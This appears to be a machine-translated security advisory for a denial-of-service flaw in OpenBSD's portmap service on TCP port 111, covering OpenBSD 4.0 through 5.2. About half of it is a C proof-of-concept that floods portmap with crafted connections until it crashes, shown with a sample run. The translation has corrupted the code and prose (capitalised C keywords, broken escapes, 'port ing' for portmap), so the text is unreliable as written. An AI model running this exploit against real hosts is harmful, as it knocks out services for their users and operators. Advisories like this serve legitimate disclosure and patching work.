OpenBSD port ing Remote Denial of Service Vulnerability

Release date:
Updated on:

Affected Systems:
OpenBSD 5.2
OpenBSD 5.1
OpenBSD 4.6
OpenBSD 4.5
OpenBSD 4.4
OpenBSD 4.3
OpenBSD 4.2
OpenBSD 4.1
OpenBSD 4.0 Stable
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56671

OpenBSD is an open-source Unix operating system.

An error occurs when OpenBSD v5.2 and earlier versions process multiple RPC requests. by sending specially crafted packets to TCP port 111, the port ing program crashes. The TCP111 port is not enabled by default. To exploit this vulnerability, you must enable port ing.

<* Source: auto2000051

Link: http://www.securelist.com/en/advisories/51299
Http://archives.neohapsis.com/archives/fulldisclosure/2012-11/0169.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

/*
* Authors: 22733db72ab3ed94b5f8a1ffcde850251fe6f466
* 6e2d3d47576f746e9e65cb4d7f3aaa1519971189
* C8e74ebd8392fda4788179f9a02bb49337638e7b
*
* Greetz: 43c86fd24bd63b100891ec4b861665e97230d6cf
* E4c0f3f28cf322779375b71f1c14d6f8308f789d
* 691cb088c45ec9e31823ca7ab0da8b4cf8079baf
* B234a149e7ef00abc0f2ec7e6cf535ef4872eabc
*
*
*-Bash-4.2 $ uname-
* OpenBSD obsd. my. domain 5.1 GENERIC #160 i386
*-Bash-4.2 $ id
* Uid = 32767 (nobody) gid = 32767 (nobody) groups = 32767 (nobody)
*-Bash-4.2 $ netstat-an-f inet | grep 111
* Tcp 0 0 127.0.0.1.111 *. * LISTEN
* Tcp 0 0 *. 111 *. * LISTEN
* Udp 0 0 127.0.0.1.111 *.*
* Udp 0 0 *. 111 *.*
*-Bash-4.2 $ gcc openbsd_libc_portmap.c
*-Bash-4.2 $./a. out
* [+] This code doesn' t deserve 1337 status output.
* [+] Trying to crash portmap on Fig: 111
* [+] 127.0.0.1: 111 is now down.
*
*/

# Include <stdio. h>
# Include <stdlib. h>
# Include <sys/socket. h>
# Include <sys/types. h>
# Include <netinet/in. h>
# Include <arpa/inet. h>

# Define HOST "127.0.0.1"
# Define PORT 111
# Define LOOP 0x100

Int main (void)
{
Int s, I;
Struct sockaddr_in saddr;

Printf ("[+] This code doesn't deserve 1337 status output. \ n ");
Printf ("[+] Trying to crash portmap on % s: % d \ n", HOST, PORT );

Saddr. sin_family = AF_INET;
Saddr. sin_port = htons (PORT );
Saddr. sin_addr.s_addr = inet_addr (HOST );

S = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP );
If (connect (s, (struct sockaddr *) & saddr, sizeof (struct sockaddr_in) =-1 ){
Printf ("[-] % s: % d is already down. \ n", HOST, PORT );
Return EXIT_FAILURE;
}

/* # Of iteration needed varies but starts working for> 0x30 */
For (I = 0; I <LOOP; ++ I ){
S = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP );
Connect (s, (struct sockaddr *) & saddr, sizeof (struct sockaddr_in ));
Send (s, "8 =========@", 10, 0 );
}

If (connect (s, (struct sockaddr *) & saddr, sizeof (struct sockaddr_in) =-1)
Printf ("[+] % s: % d is now down. \ n", HOST, PORT );
Else
Printf ("[-] % s: % d is still listening. Try to increase loop iterations... \ n ");

Return EXIT_SUCCESS;
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

OpenBSD
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.openbsd.org/security.html